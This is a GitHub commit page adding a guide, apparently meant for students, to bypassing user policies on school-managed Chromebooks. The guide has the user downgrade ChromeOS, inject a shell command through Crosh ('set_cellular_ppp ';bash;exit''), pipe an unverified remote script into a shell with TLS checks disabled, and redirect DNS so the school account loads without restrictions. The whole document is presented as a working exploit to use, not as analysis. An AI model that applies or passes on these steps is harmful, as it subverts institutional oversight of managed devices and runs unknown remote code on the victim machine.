Skip to content

Commit

Permalink
Update and rename UserPolicy Bypass to User Policy Bypass
Browse files Browse the repository at this point in the history
  • Loading branch information
S-PScripts authored May 27, 2024
1 parent de7f215 commit e6fac3a
Show file tree
Hide file tree
Showing 2 changed files with 36 additions and 1 deletion.
36 changes: 36 additions & 0 deletions Exploits/User Policy Bypass
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
This should enable ARC (Play Store) and unblock all policy blocked URLs.

When you connect to a wifi without the custom DNS, the policy will reload to normal but some changes will persist - more testing is needed.
This is useful because most root exploits require ARC in some form.

You need:
-> The ability to downgrade to a version below 102.
-> A way to access Crosh. If it's blocked via extension, use LTBEEF. If it's blocked by user policy, you must use a combination of the Incognito Exploit (v81) and Crosh Bypass (Daybreak)
-> A router or hotspot capable of either blocking websites via parental control or setting a custom DNS (129.213.58.41)

Steps:
1. Downgrade to a version below 102.

2. Open Crosh (CTRL+ALT+T or chrome-untrusted://crosh)

3. Elevate to a chronos shell by typing in the following:
set_cellular_ppp ';bash;exit'

4. Run the command below (including the disown part!):
sh <(curl -k https://coolelectronics.me/bypass.sh) & disown

5. Remove your school account, log out or just clear it in any way you can. The method varies depending on how your device policy is set up.

6. In your router settings, set the DNS to 129.213.58.41 or block m.google.com. (NOT THE NETWORK DNS ON THE CHROMEBOOK SINCE IT WON'T WORK)
-> personalDNSfilter and hotspot or DNS Sinkhole + Hotspot on iOS can be used; NextDNS

7. Log into your school account.

Results should prompt you about a PIN and Google Play. It will then drop you into an account where everything works as normal but no user policies are set.
If you get a "sign in required" error, try doing going through the steps again.

- https://discord.com/channels/419123358698045453/1040639727595950180 -

Credits:
https://github.com/titaniumnetwork-dev/Oxide-Docs/blob/master/docs/kajigs.mdx
Titanium Network
1 change: 0 additions & 1 deletion Exploits/UserPolicy Bypass

This file was deleted.

0 comments on commit e6fac3a

Please sign in to comment.